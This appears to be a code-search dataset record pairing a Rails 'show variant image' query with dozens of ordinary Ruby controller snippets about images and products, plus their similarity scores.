"def images\n @assets = filtered_assets.where(type: \"Image\").order(\"created_at DESC\").paginate(params)\n @assets = @assets.search(params[:q], fuzzy: true) if params[:q].present?\n respond_to do |format|\n format.html do\n render template: \"/dash/chooser/images\"\n end\n format.js do\n render template: \"/dash/chooser/images_search\"\n end\n end\n end",
"def images\n bugImages = BugImage.all\n render :json => bugImages.to_json\n end",
"def show\n @image_gallery = ImageGallery.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_gallery }\n end\n end",
"def index\n if params[:single]\n\t url = \"#{API_BASE_URL}/photos/#{params[:id]}.json?token=#{ENV['API_KEY']}\"\n\t response = RestClient.get(url)\n\t @photo = JSON.parse(response.body)\n\telse\n\t url = \"#{API_BASE_URL}/photos.json?token=#{ENV['API_KEY']}\"\n response = RestClient.get(url)\n @photos = JSON.parse(response.body)\t\t \n\tend\n end",
"def get_images\n {}\n end",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def get_images\n @command = :get_images\n # set a flag indicating whether or not the user wants to see all images,\n # including the hidden ones\n show_hidden = (@prev_args.peek(0) == \"-i\" || @prev_args.peek(0) == \"--hidden\")\n # get the images from the RESTful API (as an array of objects)\n uri_str = ( show_hidden ? \"#{@uri_string}?hidden=true\" : @uri_string )\n uri = URI.parse uri_str\n result = hnl_http_get(uri)\n unless result.blank?\n # convert it to a sorted array of objects (from an array of hashes)\n sort_fieldname = 'filename'\n result = hash_array_to_obj_array(expand_response_with_uris(result), sort_fieldname)\n end\n # and print the result\n print_object_array(result, \"Images:\", :style => :table)\n end",
"def show\n render json: @sample_photo\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @pictures = TaxiSevice.find(params[:id]).taxi_images\n end",
"def index\n @slider_images = SliderImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def index\n @slider_image_types = SliderImageType.all\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def show\n @product = Product.includes(:images).find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @product }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def show\n coach = Coach.find(params[:id])\n json = coach.to_json({:image_url => ActionController::Base.helpers.asset_path(coach.image_url)})\n\n respond_to do |format|\n format.json {render :json => json}\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\t\t\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @match_image = MatchImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @match_image }\n end\n end",
"def show\n render json: @picture\n end",
"def images\n Image.where(product_id: id)\nend",
"def index\n @cap_image = fetch_cap_image(params['q'])\n\n if @cap_image.nil?\n @cap_image = CapImage.all.first\n flash.now[:alert] = 'Couldn\\'t fetch random image. Here\\'s one from the archives.'\n end\n\n respond_to do |format|\n format.html\n format.json { render json: @cap_image }\n end\n end",
"def show\n @motivational_image = MotivationalImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @motivational_image }\n end\n end",
"def index\n @web_display_car_images = WebDisplayCarImage.all\n\n render json:@web_display_car_images\n end",
"def status_images\n response = JSON.parse(@client.get(\"/api/v1/status-images\").body)\n return response[\"images\"] || response\n end",
"def images\n {\n thumbnail: object.thumbnail.url(:large),\n logo: object.logo.url(:medium),\n white_logo: object.white_logo.url(:medium)\n }\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render json: @article, methods: [:image_url] }\n end\n end",
"def index\n @pictures = @album.pictures #JRD111115\n\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @pictures}\n end\n end",
"def show\n #Finds selected image\n @image = Image.find(params[:id])\n @all_products = Product.all\n @all_properties = Property.all\n\n respond_to do |format|\n format.html # show.html.erbml.erb\n format.json { render json: @image }\n format.js\n end\n end",
"def images()\n @photos = all_photos() \n @headers['Content-Type'] = CONTENT_TYPE\n end",
"def marketplace_image_my_images_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: VnfsApi.marketplace_image_my_images ...'\n end\n # resource path\n local_var_path = '/1.0.0/marketplace/image/my_images/'\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['oAuth2']\n data, status_code, headers = @api_client.call_api(:GET, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'InlineResponse2009')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: VnfsApi#marketplace_image_my_images\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def photos(id, group = 'checkin', options = {})\n get(\"venues/#{id}/photos\", {:group => group }.merge(options)).photos\n end",
"def get_images\n images = get(\"cloud-instances/#{guid}/images\")[\"images\"] || []\n\n images.map do |image|\n get_image(image[\"imageID\"])\n end.compact\n end",
"def index\n @market_segment_images = @market_segment_imageable.market_segment_images\n\n respond_to do |format|\n format.html # index.html.erb\n end\n end",
"def images artist\n url = \"http://developer.echonest.com/api/v4/artist/images?api_key=#{ECHONEST_API_KEY}&name=#{artist}&format=json&results=#{RESULTS}&start=0&license=unknown\"\n result = parseURL url\n result[\"response\"][\"images\"]\nend",
"def photos options={}\n response = client.get(\"/#{id}/photos\", options)\n end",
"def get_img_tags\n @tp = Temp.find_by_id(params[:id])\n @tp.included_images \n render :json => @tp.included_images\n # render :text => @tp.included_images \n end",
"def show\r\n @car_image = CarImage.find(params[:id])\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @car_image }\r\n end\r\n end",
"def show\n render json: @thumb\n end",
"def images(artist, options={})\n get(:standard, {:method => \"artist.getImages\", :artist => artist}.merge(options))\n end",
"def show\n @product = Product.find(params[:id]) \n @admin_images = Image.admins_photos.where(product_id: @product.id).order(:title) || []\n @users_images = Image.users_photos.where(product_id: @product.id).order(:title) || []\n respond_to do |format|\n format.html\n format.js \n format.json { render json: @product }\n end\n end",
"def list_images # :nologin:\n query = create_query(:Image, :all, :by => :created_at)\n show_selected_images(query)\n end",
"def index\n render json: Picture.all\n end",
"def show\n render json: @picture, status: :ok\n end",
"def show\n @images = @galleries_album.galleries\n end",
"def show\n @bgimage = Bgimage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @bgimage }\n end\n end",
"def show\n @pictures = TourService.find(params[:id]).tour_images\n # render :show\n end",
"def index\n wishes = Wish.all.with_attached_image.where(is_secret: false)\n render json: { wishes: generate_image_url(wishes) }\n end",
"def index\n @img_lists = ImgList.all\n render json: @img_lists\n end",
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @recipe_images = RecipeImage.all\n end",
"def show\n album = Album.includes(:album_images).find(params[:id])\n return_hash = album.attributes\n return_hash['album_images'] = album.album_images\n render json: return_hash\n end",
"def index\n @images = Image.all\n respond_with @images\n end",
"def images\n []\n end",
"def get_colours\n @item = Item.find(params[:id])\n @colours = @item.variants_for(:colour, params[:size], nil)\n respond_to do |format|\n format.json { render :json => @colours }\n end\n end",
"def show\n @property_image = PropertyImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @property_image }\n end\n end",
"def show\n @instance = Instance.find(params[:id])\n @flavor = Flavor.find_by_flavor_id(@instance.flavor_id)\n @image = Image.find_by_image_id(@instance.image_id)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @instance }\n end\n end",
"def show\n @category_image = CategoryImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @category_image }\n end\n end"
] | [
"0.72741795",
"0.72619855",
"0.7065044",
"0.7058683",
"0.68506616",
"0.6846892",
"0.6785741",
"0.67399204",
"0.66757697",
"0.6659554",
"0.6637402",
"0.6637402",
"0.6605622",
"0.6602113",
"0.6601908",
"0.65993196",
"0.6594103",
"0.65900457",
"0.6587071",
"0.65866446",
"0.6584074",
"0.658382",
"0.65725535",
"0.6560661",
"0.6527081",
"0.65111953",
"0.65000814",
"0.6494236",
"0.64889586",
"0.64835715",
"0.6452451",
"0.64392745",
"0.6435668",
"0.64354694",
"0.6431692",
"0.63823014",
"0.6378937",
"0.63742584",
"0.6353165",
"0.63500136",
"0.6348642",
"0.6334541",
"0.6333671",
"0.6333029",
"0.6329741",
"0.6322984",
"0.6322984",
"0.6322984",
"0.6322984",
"0.632007",
"0.6317408",
"0.6306685",
"0.63028026",
"0.62962806",
"0.62962806",
"0.62818766",
"0.6270492",
"0.6267543",
"0.6267222",
"0.6266554",
"0.6252117",
"0.62505436",
"0.62421894",
"0.62398607",
"0.62315",
"0.6229657",
"0.6227675",
"0.62271065",
"0.62251335",
"0.62214047",
"0.6216607",
"0.62058395",
"0.62058395",
"0.62002957",
"0.61999786",
"0.61860687",
"0.6183684",
"0.61817896",
"0.6179855",
"0.61713713",
"0.61662155",
"0.61601275",
"0.6155993",
"0.61556387",
"0.6155223",
"0.6147296",
"0.6145668",
"0.6144238",
"0.61427766",
"0.6140481",
"0.6139509",
"0.61392903",
"0.6133928",
"0.6128057",
"0.61234856",
"0.6118853",
"0.611544",
"0.61142117",
"0.61104566",
"0.61030346"
] | 0.7974657 | 0 |
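The next row's document is a Rails scaffold `show` action for `VariantImage`, with HTML, JS, and JSON branches. A minimal client sketch for the JSON branch, assuming the flat `resources :variant_images` route implied by the row's query; the host, port, and record id are hypothetical:

require 'net/http'
require 'json'

# Fetch a single variant image as JSON (hypothetical local server and id).
uri = URI('http://localhost:3000/variant_images/1.json')
record = JSON.parse(Net::HTTP.get(uri))
record['variant_id'] # => id of the owning variant, per `render json: @variant_image`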
GET /variant_images/1 GET /variant_images/1.json | def show
@variant_image = VariantImage.find(params[:id])
@variant = @variant_image.variant
respond_to do |format|
format.html # show.html.erb
    format.js # show.js.erb
format.json { render json: @variant_image }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def index\n @variant_images = VariantImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variant_images }\n end\n end",
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def index\n @product_images = ProductImage.where(product_uuid: params[:product_id])\n render json: @product_images, status: 200\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def show\n @image = Image.find(params[:id])\n\n render json: @image\n end",
"def index\n if params[:single]\n\t url = \"#{API_BASE_URL}/photos/#{params[:id]}.json?token=#{ENV['API_KEY']}\"\n\t response = RestClient.get(url)\n\t @photo = JSON.parse(response.body)\n\telse\n\t url = \"#{API_BASE_URL}/photos.json?token=#{ENV['API_KEY']}\"\n response = RestClient.get(url)\n @photos = JSON.parse(response.body)\t\t \n\tend\n end",
"def show\n @image_url = ImageUrl.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_url }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def image_list\n @images = Picture.where(album_id: params[:album_id])\n respond_to do |format|\n format.json { render json: @images.to_json(methods: [:path])}\n end\n end",
"def index\n @pictures = Picture.where(foodscape_id: params[:foodscape_id])\n render json: @pictures\n end",
"def show\n @image = Image.find(params[:id])\n\t\t\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n @image = Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def images\n @picturesandmeta = Pictureandmeta.all\n @kind = Kind.find(params[:kind_id])\n Rails.logger.info(\"Kind: #{@kind.inspect}\")\n end",
"def show\n @image_set = ImageSet.find(params[:id])\n\n render json: @image_set\n end",
"def index\n @images = Image.all\n\n render json: @images\n end",
"def images\n response = JSON.parse( self.class.get(\"#{BASE_URL}/contest/#{@api_key}/images\") )\n end",
"def show\n render json:@web_display_car_image\n end",
"def show\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estate_agent_image }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def show\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.slim\n format.json { render json: @images }\n end\n end",
"def show\n render json: @family_image\n end",
"def show\n @motivational_image = MotivationalImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @motivational_image }\n end\n end",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @image }\n end\n end",
"def getimagesinfo\n trek = Trek.find_by_id(params[:id])\n send_data(trek.get_images_info.to_json,\n {:type => \"application/json\", :disposition => \"inline\"})\n end",
"def index\n @cap_image = fetch_cap_image(params['q'])\n\n if @cap_image.nil?\n @cap_image = CapImage.all.first\n flash.now[:alert] = 'Couldn\\'t fetch random image. Here\\'s one from the archives.'\n end\n\n respond_to do |format|\n format.html\n format.json { render json: @cap_image }\n end\n end",
"def show\n @image_gallery = ImageGallery.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_gallery }\n end\n end",
"def show\n @match_image = MatchImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @match_image }\n end\n end",
"def get_image_by_uuid\n @command = :get_image_by_uuid\n # the UUID was the last \"previous argument\"\n image_uuid = @prev_args.peek(0)\n # setup the proper URI depending on the options passed in\n uri = URI.parse(@uri_string + '/' + image_uuid)\n # and get the results of the appropriate RESTful request using that URI\n result = hnl_http_get(uri)\n # finally, based on the options selected, print the results\n print_object_array(hash_array_to_obj_array([result]), \"Image:\")\n end",
"def index\n @images = Image.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def get_all_images(env)\n images_json = get(env, \"#{@session.endpoints[:image]}/images\")\n images = JSON.parse(images_json)['images']\n\n return images if images.empty?\n\n is_v1 = false\n unless images[0].key? 'visibility'\n is_v1 = true\n images_json = get(env, \"#{@session.endpoints[:image]}/images/detail\")\n images = JSON.parse(images_json)['images']\n end\n\n images.map do |i|\n i['visibility'] = i['is_public'] ? 'public' : 'private' if is_v1\n Image.new(i['id'], i['name'], i['visibility'], i['size'], i['min_ram'], i['min_disk'])\n end\n end",
"def show\n @pictures = TaxiSevice.find(params[:id]).taxi_images\n end",
"def show\n @property_image = PropertyImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @property_image }\n end\n end",
"def show\n render json: @sample_photo\n end",
"def images() \n uri = URI.parse(\"http://\" + @location.host + \":9292/v2/images\")\n return get_request(uri, @token)\n end",
"def show\r\n @car_image = CarImage.find(params[:id])\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @car_image }\r\n end\r\n end",
"def show\n @s3_image = S3Image.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @s3_image }\n end\n end",
"def index\n @variants = Variant.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variants }\n end\n end",
"def show\n @review_image = ReviewImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @review_image }\n end\n end",
"def images\n IbmCloudRest.get \"#{@uri}/images\"\n end",
"def show\n @product = Product.includes(:images).find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @product }\n end\n end",
"def list\n @api.get(\"#{@api.path}/Images\")\n end",
"def show\n @image_upload = ImageUpload.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_upload }\n end\n end",
"def items\n @beverages = Beverage.available\n respond_to do |format|\n format.json { render :json => @beverages.to_json(methods: :image_url)}\n end\n end",
"def show\n @bgimage = Bgimage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @bgimage }\n end\n end",
"def show\n @instance = Instance.find(params[:id])\n @flavor = Flavor.find_by_flavor_id(@instance.flavor_id)\n @image = Image.find_by_image_id(@instance.image_id)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @instance }\n end\n end",
"def product_images\n user_id, product = params[:user_id], params[:id]\n return bad_request if !user_id || !product\n # returns all images for a given user and product\n images = UserProduct.find_images(user_id, product)\n # create json array\n img = images ? images.collect { |i| i.js_serialize } : []\n render :json => img\n end",
"def get_sizes\n @item = Item.find(params[:id])\n @sizes = @item.variants_for(:size, nil, params[:colour])\n respond_to do |format|\n format.json { render :json => @sizes }\n end\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def show\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @variant }\n end\n end",
"def index\n @images = getmydata(\"Image\")\n pagination\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def show\n render json: @picture\n end",
"def _state_photos(state_id)\n get('state/photos', state_id, options: { type: :array })\n end",
"def show\n @imagem = Imagem.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @imagem }\n end\n end",
"def show\n coach = Coach.find(params[:id])\n json = coach.to_json({:image_url => ActionController::Base.helpers.asset_path(coach.image_url)})\n\n respond_to do |format|\n format.json {render :json => json}\n end\n end",
"def show\n @category_image = CategoryImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @category_image }\n end\n end",
"def image(id, nsfw = false)\n img = get url: \"images/#{id}\", nsfw: nsfw\n img['image'] if img\n end",
"def show\n @image = ImagePost.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def show\n render json: @web_car_gallery\n end",
"def show\n #Finds selected image\n @image = Image.find(params[:id])\n @all_products = Product.all\n @all_properties = Property.all\n\n respond_to do |format|\n format.html # show.html.erbml.erb\n format.json { render json: @image }\n format.js\n end\n end",
"def images(product_id, variation_id, params = {})\n path = \"/products/#{product_id}/variations/#{variation_id}/images\"\n\n response, status = BeyondApi::Request.get(@session,\n path,\n params)\n\n handle_response(response, status)\n end",
"def index\n @pictures = @album.pictures #JRD111115\n\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @pictures}\n end\n end",
"def show\n @slide_image = SlideImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slide_image }\n end\n end",
"def show\n render json: @picture, status: :ok\n end",
"def images\n Image.where(product_id: id)\nend",
"def show\n @photo = Photo.find(params[:id])\n\n render json: @photo\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render json: @article, methods: [:image_url] }\n end\n end",
"def show\n # proxy to GET /roi/id\n @result = ImageServer.get('/roi/'+params[:id]);\n render :json => @result\n end",
"def index\n @family_images = FamilyImage.all\n\n render json: @family_images\n end",
"def show\n @banner_img = BannerImg.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @banner_img }\n end\n end",
"def show\n @image_section = ImageSection.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_section }\n end\n end",
"def marketplace_image_my_images_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: VnfsApi.marketplace_image_my_images ...'\n end\n # resource path\n local_var_path = '/1.0.0/marketplace/image/my_images/'\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['oAuth2']\n data, status_code, headers = @api_client.call_api(:GET, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'InlineResponse2009')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: VnfsApi#marketplace_image_my_images\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @image_datum = ImageDatum.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_datum }\n end\n end",
"def show\n render json: @thumb\n end",
"def get_images_data\t\t\t\t\t\t\n\t\t{ payload: { 'makes' => makes_dropdown, 'images' => images_array('none').compact}, success: true}\n\tend",
"def show\n @image = Image.find(params[:id])\n checkaccountobject(\"images\",@image)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def image\n\t\t@image ||= Image.joins(:album)\n .where(id: params[:id], :albums => {:user_id => user_id})\n .take || halt(404)\n\tend",
"def images(params = {})\n @api.get(\"#{@api.path}/List/#{@id}/Images\", params: params)\n end",
"def images\n @assets = filtered_assets.where(type: \"Image\").order(\"created_at DESC\").paginate(params)\n @assets = @assets.search(params[:q], fuzzy: true) if params[:q].present?\n respond_to do |format|\n format.html do\n render template: \"/dash/chooser/images\"\n end\n format.js do\n render template: \"/dash/chooser/images_search\"\n end\n end\n end",
"def get_images\n @command = :get_images\n # set a flag indicating whether or not the user wants to see all images,\n # including the hidden ones\n show_hidden = (@prev_args.peek(0) == \"-i\" || @prev_args.peek(0) == \"--hidden\")\n # get the images from the RESTful API (as an array of objects)\n uri_str = ( show_hidden ? \"#{@uri_string}?hidden=true\" : @uri_string )\n uri = URI.parse uri_str\n result = hnl_http_get(uri)\n unless result.blank?\n # convert it to a sorted array of objects (from an array of hashes)\n sort_fieldname = 'filename'\n result = hash_array_to_obj_array(expand_response_with_uris(result), sort_fieldname)\n end\n # and print the result\n print_object_array(result, \"Images:\", :style => :table)\n end",
"def show\n @home_categories_products_indices_photo = Home::Categories::Products::Indices::Photo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @home_categories_products_indices_photo }\n end\n end",
"def show\n @hotel_pic = HotelPic.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @hotel_pic }\n end\n end",
"def index\n @slider_images = SliderImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def index\n @slider_image_types = SliderImageType.all\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def images\n images = []\n JSON.parse(resource['/offerings/image'].get)[\"images\"].each do |img|\n images << Image.new(img)\n end\n return images\n end",
"def show\n @web_image = WebImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @web_image }\n end\n end",
"def show\n @combined_image = CombinedImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @combined_image }\n end\n end",
"def getImage\n image=AWS::S3::S3Object.url_for('testing.png','tradeDev')\n render :json => {:image=>image}\n end",
"def show\n @picture = @album.pictures.find(params[:id]) #JRD111115\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @picture}\n end\n end",
"def images\n bugImages = BugImage.all\n render :json => bugImages.to_json\n end",
"def index\n # @images = Image.all\n # @images = Image.order(\"id\").page(params[:page])\n @images = Image.page(params[:page])\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def show\n @pictures = TourService.find(params[:id]).tour_images\n # render :show\n end",
"def show\n # maybe I need to uncomment this:\n # @image = Image.find(params[:id]) \n # add_breadcrumb @image, image_path(@image) \n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end"
] | [
"0.7800791",
"0.7155099",
"0.70267254",
"0.69889295",
"0.6987502",
"0.6987502",
"0.67943203",
"0.6752776",
"0.66671115",
"0.66671115",
"0.66671115",
"0.66671115",
"0.6665982",
"0.6631958",
"0.6629154",
"0.6613807",
"0.6606048",
"0.66020113",
"0.66002864",
"0.65955347",
"0.6582523",
"0.65727264",
"0.65668374",
"0.655884",
"0.6538189",
"0.6538189",
"0.6538016",
"0.65311813",
"0.650726",
"0.6500925",
"0.6489309",
"0.648821",
"0.6482609",
"0.6465915",
"0.64471453",
"0.64460534",
"0.6435624",
"0.6419042",
"0.64036113",
"0.6393731",
"0.63922125",
"0.63869417",
"0.6380044",
"0.63683736",
"0.6368284",
"0.6367777",
"0.63619465",
"0.6358434",
"0.6357052",
"0.63428694",
"0.63405526",
"0.63397497",
"0.63358516",
"0.63355124",
"0.6331572",
"0.6331572",
"0.63307226",
"0.6321791",
"0.6320614",
"0.6315715",
"0.6315229",
"0.6314807",
"0.6310178",
"0.63075984",
"0.6300438",
"0.6297653",
"0.6294552",
"0.62906426",
"0.62868655",
"0.6278393",
"0.62739754",
"0.62686497",
"0.6268517",
"0.6265852",
"0.62532437",
"0.6252447",
"0.6251686",
"0.62488353",
"0.6246514",
"0.6245801",
"0.6244335",
"0.62413156",
"0.62400186",
"0.6237236",
"0.6234503",
"0.6223787",
"0.6222654",
"0.62154055",
"0.6211591",
"0.62069374",
"0.62063605",
"0.62016416",
"0.619991",
"0.61969775",
"0.61875314",
"0.61840886",
"0.6171186",
"0.6166071",
"0.6161978",
"0.6161041"
] | 0.7340816 | 1 |
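The next row's `new` action pre-associates the fresh `VariantImage` with the `Variant` named by `params[:variant_id]`. A minimal console sketch of the same setup (model names come from the row; the id is hypothetical):

variant = Variant.find(42) # hypothetical id
image = VariantImage.new(variant_id: variant.id)
image.variant_id == variant.id # => true; the rendered form then posts to `create`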
GET /variant_images/new GET /variant_images/new.json | def new
@variant_image = VariantImage.new
@variant = Variant.find(params[:variant_id])
@variant_image.variant_id = @variant.id
@product = @variant.product
respond_to do |format|
format.html # new.html.erb
format.js # new.js.erb
format.json { render json: @variant_image }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
